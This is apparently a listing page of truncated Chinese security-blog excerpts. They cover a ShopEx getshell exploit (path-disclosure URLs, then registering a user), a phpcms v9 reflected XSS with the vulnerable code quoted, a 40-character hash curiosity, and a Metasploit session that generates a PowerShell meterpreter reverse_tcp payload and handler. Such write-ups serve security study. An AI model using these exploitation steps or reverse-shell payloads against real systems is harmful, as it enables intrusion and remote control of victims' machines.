shopex 前台普通用户 getshell 漏洞

利用方法: 第一个: 想办法找到目标网站的绝对路径 http://www.test.com/install/svinfo.php?phpinfo=true http://www.test.com/core/api/shop_api.php http://www.test.com/core/api/site/2.0/api_b2b_2_0_cat.php http://www.test.com/core/api/site/2.0/api_b2b_2_0_goodstype.php http://www.test.com/core/api/site/2.0/api_b2b_2_0_brand.php shopex存在很多爆路径的漏洞,请自行研究。 第二个: 注册一个普通用户 http://www.test.com/?passport-signup.html 第三个: 发送

phpcms v9 三个 xss

Author:qingsh4n Blog:http://hi.baidu.com/new/qingsh4n Article:phpcms v9三个xss 0x1 map.php文件反射型xss 漏洞出现在/api/map.php 265行左右: <?php } elseif(!empty($_GET['city']) && $maptype==1) { if(!$_GET['city']) showmessage(L('error')); $city = urldecode(trim($_GET['city'])); echo $city; } ?> 可以看出$

一个40位的“md5”

在乌云zone看到了一个40位的“md5”,奇怪啊。 去搜索了一下,原来是这样的。 ------------------------ 假设我们的密码为admin,那么经过MD5加密得到密文为:

Metasploit and PowerShell payloads

=[ metasploit v4.5.0-dev [core:4.5 api:1.0] + -- --=[ 969 exploits - 511 auxiliary - 155 post + -- --=[ 261 payloads - 28 encoders - 8 nops msf > use windows/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST 172.24.24.41 LHOST => 172.24.24.41 msf payload(reverse_tcp) > generate -t psh -f pwShell.ps1 [*] Writing 2909 bytes to pwShell.ps1... msf payload(reverse_tcp) > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler)